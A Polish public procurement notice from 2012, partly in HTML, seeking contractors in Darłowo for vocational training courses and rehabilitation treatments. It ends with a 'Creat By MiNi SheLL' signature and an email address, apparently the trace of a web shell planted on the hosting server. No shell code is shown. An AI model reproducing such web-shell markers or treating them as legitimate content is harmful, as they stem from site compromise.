przepisy i normy obow. w gospodarce żywnościowej, technologia gastronomiczna i towaroznawstwo w gastronomii, wartości energetyczne produktów,  warunki bezpieczeństwa , higiena produkcji żywności ,systemy HCAP, GMP.
Wykonawca dokona zakupu podręczników Technologia gastronomiczna z towaroznawstwem część 1 i 2 i przekaże  je na własność uczestnikom kursu
Ilość godzin ogółem: 150, w tym: 40 godz. zajęć teoretycznych oraz 110godzin zajęć praktycznych.
Kurs zostanie zakończony egzaminem wewnętrznym.

kurs- magazynier z obsługą wózków jezdniowych  
moduł 1- magazynier z obsługą programu Subiekt- 35 godzin,
moduł 2- wózki jezdniowe z wymianą butli gazowych- 80 godzin( w tym 46 godz. zajęć teoretycznych i 34 godz. praktycznych, w tym zajęcia na wózku-w 2 grupach 3-4 osobowych -,po 15 godzin  dla każdej grupy)
-warunkiem  realizacji kursu jest posiadanie certyfikatu  uprawniającego do prowadzenia  kursu wózki jezdniowe z napędem silnikowy oraz certyfikatu na bezpieczną wymianę butli gazowych
-program kursu uzgodniony z Urzędem Dozoru technicznego  
-kurs zakończony egzaminem Urzędu Dozoru Technicznego

kurs - operatora koparko-ładowarki klasy III
-realizacja kursu zgodnie z rozp. Ministra Gospodarki z 20.09.2001 r w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych( Dz.U. Nr 118, poz. 1263).
-Warunkiem realizacji kursu jest posiadanie potwierdzenia  Instytutu Mechanizacji budownictwa i Górnictwa Skalnego w Warszawie  spełniania warunków § 25 rozporządzenia  Ministra Gospodarki z 20.09.2001 r
-czas trwania kursu-202 godziny, w tym 116 godz. zajęć teoretycznych i 86 godz. praktycznych.,
-Kurs zakończony egzaminem państwowym Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.

Miejsce realizacji kursu	 w części teoretycznej zajęcia będą  prowadzone w sali dydaktycznej na terenie Darłowa dostosowanej do prowadzenia zajęć szkoleniowych i   wyposażonej w sprzęt niezbędny do przeprowadzenia szkolenia , spełniającej warunki bhp i ppoż, oraz  warunki sanitarne .
w części praktycznej kursów zajęcia mogą odbywać się poza Darłowem ,pod warunkiem, że Wykonawca zapewni bezpłatny dowóz uczestników na zajęcia oraz powrót. Odległość  z Darłowa do miejsca prowadzenia zajęć nie powinna być większa niż 40 km. w jedną stronę
Termin realizacji	sierpień - 15 grudzień 2012 r - zajęcia powinny odbywać się od poniedziałku do piątku z wyłączeniem dni świątecznych
- część teoretyczna - 1 godz.= 45 minut
- część praktyczna-1  godzina - 60 minut 
Zajęcia nie powinny trwać dłużej niż 8 godzin dziennie.
Obowiązki Wykonawcy	Wykonawca zapewnia:
1)	badanie lekarskie, jeżeli specyfika kursy tego wymaga,
2)	niezbędne materiały szkoleniowe ,w tym podręczniki, jeżeli specyfika kursu tego wymaga,
3)	niezbędną odzież i obuwie ochronne  w czasie zajęć  praktycznych.
4)	ubezpieczenie NNW,
5)	sprawny technicznie sprzęt i urządzenia niezbędne do przeprowadzenia kursów
6)	catering( woda mineralna , kawa, herbata, 2 rodzaje ciastek, słone paluszki  ) w trakcie każdych zajęć , 
7)	w trakcie zajęć trwających dłużej niż 6 godzin Wykonawca zapewnia catering w formie drugiego dania obiadowego( ziemniaki, sztuka mięsa, surówka)
8)	realizację kursów zgodnie z przedstawionym i zaakceptowanym przez Zamawiającego harmonogramem zajęć.
9)	 doświadczoną kadrę posiadającej wymagane uprawnienia,   
10)	dostarczenie Zamawiającemu pełnej dokumentacji przeprowadzonych kursów  tj.  list obecności, sprawozdania z przebiegu kursów wraz ze zdjęciami, potwierdzenia odbioru materiałów szkoleniowych, odzieży i obuwia ochronnego,  potwierdzenia korzystania z cateringu, kserokopie zaświadczeń oraz dokumentów potwierdzających  ukończeniu kursu lub zdanie egzaminu wewnętrznego lub państwowego,
 
płatność	Możliwość częściowej zapłaty za wykonanie części zadania, nie częściej niż raz w m-cu. Płatności za wykonane w danym m-cu usługi nastąpi na podstawie wystawionych rachunków oraz częściowego sprawozdania z realizacji zadania w danym m-cu. Ostatnia  płatność po zakończeniu zadania i  dostarczeniu Zamawiającemu wszystkich wymaganych dokumentów . 
Dokumenty dla uczestników	 Zaświadczenie o ukończeniu kursu zgodnie z rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz.U.Nr 31, poz. 216 z 2006 r)

Pozostałe wymagania	1)	oznaczenie pomieszczenia , w którym prowadzone będą zajęcia, materiałów szkoleniowych orz pozostałej dokumentacji zgodnie z wytycznymi dot. oznaczania projektów w ramach POKL- logotypy do pobrania na stronie: www.pokl-darlowo.pl 
2)	bieżące informowanie Zamawiającego o nieobecnościach  beneficjentów na zajęciach,
3)	niezwłoczne pisemne poinformowanie Zamawiającego o zmianie osoby prowadzącej szkolenie z podaniem przyczyny zmiany oraz danych nowej osoby. Zmiana osoby prowadzącej szkolenie nie może skutkować pogorszeniem poziomu szkolenia. Wykonawca jest zobowiązany zapewnić kontynuację szkolenia przez osobę posiadającą wymagane kwalifikacje i doświadczenie gwarantujące nie gorszy poziom szkolenia niż osoba pierwotnie wskazana. Wykonawca musi uzyskać akceptację Zamawiającego na powyższą zmianę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Posiadanie certyfikatu systemu zarządzania jakością ISO - 20</li>
<li>3. Posiadanie akredytacji Kuratora Oświaty właściwego dla siedziby placówki wykonawcy - 20</li>
<li>4. Posiadanie wpisu do ewidencji szkół i placówek niepublicznych - placówek kształcenia ustawicznego. - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kurs obsługi komputera z kasą fiskalną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj kursu
	Kurs obsługi komputera z  kasą fiskalną- dla 5 osób
Kursy zawodowe będą realizowane w formie kształcenia ustawicznego w formach pozaszkolnych zgodnie z rozporządzeniem Ministra  Edukacji i Nauki z 3 lutego 2006 r w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz.U.Nr 31, poz. 216 )

Zakres merytoryczny kursu	Zakres kursu powinien obejmować m. innymi:
1)	budowa i obsługa komputera od podstaw,
2)	zapoznanie się z zasadami pracy w systemie  MS Windows,
3)	zarządzanie danymi- pliki, foldery, tworzenie, kasowanie, przenoszenie, instalowanie programów
4)	podstawy obsługi edytora tekstów MS Word,
5)	podstawy obsługi arkusza kalkulacyjnego MS Excel,
6)	bezpieczeństwo komputera i sieci komputerowej przed zagrożeniami,  
7)	prezentacja programów graficznych do edycji oraz przetwarzania zdjęć,
8)	internet- okno na świat,
9)	zakładanie poczty internetowej,
10)	obsługa poczty internetowej jako narzędzia  do poszukiwania pracy,
11)	obsługa urządzeń biurowych- fax, ksero, skaner, drukarki,
12)	obsługa kasy fiskalnej .
Miejsce realizacji kursu	 sala dydaktyczna  na terenie Darłowa  dostosowana do prowadzenia zajęć szkoleniowych z zakresu obsługi komputera,   spełniająca warunki bhp i ppoż, oraz  warunki sanitarne , wyposażona w sprawny technicznie  sprzęt komputerowy i  kasy fiskalne w ilości odpowiadającej liczbie uczestników szkolenia, z dostępem do internetu ,  
Liczba godzin	Ogółem 120 godzin zajęć  ( 1 godz. - 45 minut )  
Zajęcia nie powinny trwać dłużej niż 8godzin dziennie
Termin realizacji	sierpień - 15 grudzień 2012 r  - zajęcia powinny odbywać się od poniedziałku do piątku z wyłączeniem dni świątecznych
 
Obowiązki Wykonawcy	Wykonawca zapewnia:
1)	niezbędne materiały szkoleniowe,
2)	ubezpieczenie NNW,
3)	catering( woda mineralna, kawa, herbata, 2 rodzaje ciastek, słone paluszki  ) w trakcie każdych zajęć , 
1)	w trakcie zajęć trwających dłużej niż 6 godzin Wykonawca zapewnia catering w formie drugiego dania obiadowego( ziemniaki, sztuka mięsa, surówka)
4)	realizację kursu zgodnie z przedstawionym i zaakceptowanym przez Zamawiającego harmonogramem zajęć.
5)	 sprawny technicznie sprzętu (komputery, kasy fiskalne) z legalnym programowaniem zgodnym z tematyką szkolenia,
6)	 Kadrę  posiadającą wymagane uprawnienia i doświadczenie w realizacji przedmiotu zamówienia, zgodnie z wymogami (pkt 10)   
7)	dostarczenie Zamawiającemu pełnej dokumentacji przeprowadzonego kursu  tj. list obecności, sprawozdania z przebiegu kursu wraz ze zdjęciami, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia korzystania z cateringu, kserokopie zaświadczeń potwierdzających  ukończeniu kursu,

płatność	Możliwość częściowej zapłaty za wykonanie części zadania, nie częściej niż raz w m-cu. Płatności za wykonane w danym m-cu usługi nastąpią na podstawie wystawionych rachunków oraz częściowego sprawozdania z realizacji zadania w danym m-cu. Ostatnia  płatność po zakończeniu zadania i  dostarczeniu Zamawiającemu wszystkich wymaganych dokumentów . 

Dokumenty dla uczestników	Zaświadczenie o ukończeniu kursu zgodnie z rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006 r .
Pozostałe wymagania	1)	oznaczenie pomieszczenia , w którym prowadzone będą zajęcia, materiałów szkoleniowych orz pozostałej dokumentacji zgodnie z wytycznymi dot. oznaczania projektów w ramach POKL- logotypy do pobrania na stronie: www.pokl-darlowo.pl 
2)	bieżące informowanie Zamawiającego o nieobecnościach  beneficjentów na zajęciach,
3)	niezwłoczne pisemne poinformowanie Zamawiającego o zmianie osoby prowadzącej szkolenie z podaniem przyczyny zmiany oraz danych nowej osoby. Zmiana osoby prowadzącej szkolenie nie może skutkować pogorszeniem poziomu szkolenia. Wykonawca jest zobowiązany zapewnić kontynuację szkolenia przez osobę posiadającą wymagane kwalifikacje i doświadczenie gwarantujące nie gorszy poziom szkolenia niż osoba pierwotnie wskazana. Wykonawca musi uzyskać akceptację Zamawiającego na powyższą zmianę,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zabiegi rehabilitacyjne -dla 14 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce realizacji zabiegów rehabilitacyjnych
	1)	Ośrodek rehabilitacyjny, w którym będą wykonywane zabiegi  powinien znajdować się w odległości nie większej niż 20 km od Darłowa.
2)	Ośrodek rehabilitacyjny powinien posiadać wpis  do rejestru wojewody ośrodków, w których mogą odbywać się turnusy rehabilitacyjne   i uprawniony jest do przyjmowania zorganizowanych grup turnusowych.

Planowana liczba osób do objęcia zabiegami	14 osób
Liczba zabiegów	10 dni , po 5 zabiegów dziennie dla każdego uczestnika zgodnie z zaleceniem lekarza z ośrodka rehabilitacyjnego, w którym mają być wykonywane zabiegi
Termin realizacji	październik- 15 grudzień 2012 r od poniedziałku do piątku z wyłączeniem dni świątecznych
Obowiązki Wykonawcy	Wykonawca zapewnia:
1)	ubezpieczenie NNW,
2)	badanie lekarskie,
3)	 zbiorowy bezpłatny dojazd uczestników na zabiegi do ośrodka rehabilitacyjnego oraz powrót do Darłowa
4)	realizacja zabiegów zgodnie z przedstawionym i zaakceptowanym przez Zamawiającego harmonogramem zabiegów określających  terminy zabiegów, rodzaj zabiegów przyznanych dla poszczególnych uczestników itp
5)	zapewnienie doświadczonej  kadry realizującej przedmiot zamówienia,    
6)	dostarczenie Zamawiającemu pełnej dokumentacji z wykonania przedmiotu zamówienia  tj. sprawozdania z realizacji zadania wraz ze zdjęciami, wykazu zabiegów rehabilitacyjnych zaleconych przez lekarza dla każdego uczestnika  wraz z potwierdzeniem ich wykonania,

płatność	Po zakończeniu realizacji zadania i dostarczeniu Zamawiającemu wszystkich wymaganych dokumentów
Pozostałe wymagania	1)	Oznaczenia pomieszczeń , w których prowadzone będą zabiegi oraz   prowadzonej  dokumentacji dot. zabiegów rehabilitacyjnych zgodnie z wytycznymi dot. oznaczania projektów w ramach POKL- logotypy do pobrania na stronie: www.pokl-darlowo.pl 
2)	Bieżące  informowanie Zamawiającego o nieobecnościach  beneficjentów na zabiegach, przypadkach rezygnacji zabiegów, itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com